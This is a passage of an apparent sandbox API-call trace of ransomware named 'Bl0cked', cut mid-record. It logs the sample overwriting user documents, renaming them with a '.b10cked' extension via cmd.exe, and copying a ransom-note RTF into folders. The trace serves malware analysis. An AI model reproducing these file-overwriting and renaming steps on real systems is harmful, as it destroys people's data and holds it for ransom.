\"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0x728, dwThreadId=0x110)) returned 1 [0137.469] CloseHandle (hObject=0x110) returned 1 [0137.469] CloseHandle (hObject=0x114) returned 1 [0137.469] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\bl0cked-readme.rtf")) returned 0x20 [0137.469] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0137.469] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0137.469] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0137.469] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.470] ReleaseMutex (hMutex=0xf8) returned 1 [0137.470] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.470] ReleaseMutex (hMutex=0xf8) returned 1 [0137.470] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.470] 
ReleaseMutex (hMutex=0xf8) returned 1 [0137.470] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.470] ReleaseMutex (hMutex=0xf8) returned 1 [0137.470] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\BmSmSSu.doc" (normalized: "c:\\users\\eebsym5\\documents\\bmsmssu.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18468 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.470] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19425919996) returned 1 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18468 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18468 [0137.470] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x18468 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.470] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18468 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18468 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18468 [0137.471] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18468 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18468 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x18468 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.471] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x17f80 [0137.471] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: 
lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0137.472] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0137.472] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.472] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x18468 [0137.472] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.472] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0137.472] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.472] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x18468 [0137.472] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.473] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.473] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xc233, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xc233, lpOverlapped=0x0) returned 1 [0137.473] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 
0x0 [0137.473] WriteFile (in: hFile=0x114, lpBuffer=0x12594a8*, nNumberOfBytesToWrite=0xc233, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12594a8*, lpNumberOfBytesWritten=0x12ec1c*=0xc233, lpOverlapped=0x0) returned 1 [0137.473] SetFilePointer (in: hFile=0x114, lDistanceToMove=-49715, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc235 [0137.474] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xc233, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xc233, lpOverlapped=0x0) returned 1 [0137.474] SetFilePointer (in: hFile=0x114, lDistanceToMove=-49715, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xc235 [0137.474] WriteFile (in: hFile=0x114, lpBuffer=0x12594a8*, nNumberOfBytesToWrite=0xc233, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12594a8*, lpNumberOfBytesWritten=0x12ec1c*=0xc233, lpOverlapped=0x0) returned 1 [0137.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BmSmSSu.doc", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0137.478] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BmSmSSu.doc", cchWideChar=11, lpMultiByteStr=0x131326c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BmSmSSu.doc", lpUsedDefaultChar=0x0) returned 11 [0137.478] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x18468 [0137.478] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0137.478] 
CloseHandle (hObject=0x114) returned 1 [0137.479] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\BmSmSSu.doc", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc") returned 0x25 [0137.480] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0137.480] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\BmSmSSu.doc.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0x12c, dwThreadId=0x128)) returned 1 [0137.498] CloseHandle (hObject=0x110) returned 1 [0137.498] CloseHandle (hObject=0x114) returned 1 [0137.498] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0137.498] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0137.498] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", 
cchCount2=41) returned 1 [0137.498] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0137.498] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0137.498] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0137.498] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0137.498] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0137.498] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0137.498] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0137.499] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0137.499] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0137.499] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, 
dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0x738, dwThreadId=0x4d4)) returned 1 [0137.504] CloseHandle (hObject=0x110) returned 1 [0137.504] CloseHandle (hObject=0x114) returned 1 [0137.504] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\bl0cked-readme.rtf")) returned 0x20 [0137.504] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0137.504] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0137.504] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0137.504] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.504] ReleaseMutex (hMutex=0xf8) returned 1 [0137.504] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.504] ReleaseMutex (hMutex=0xf8) returned 1 [0137.504] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.504] ReleaseMutex (hMutex=0xf8) returned 1 [0137.504] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.504] ReleaseMutex (hMutex=0xf8) returned 1 [0137.504] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\pWkwXr56WJA6 l5.ods" (normalized: "c:\\users\\eebsym5\\desktop\\pwkwxr56wja6 l5.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0137.505] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x116d4 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.505] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19429391944) returned 1 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x116d4 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x116d4 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x116d4 [0137.505] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x116d4 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x116d4 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.505] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x116d4 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x116d4 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x116d4 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x116d4 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.506] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x111ec [0137.506] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0137.507] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0137.507] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.507] SetFilePointer 
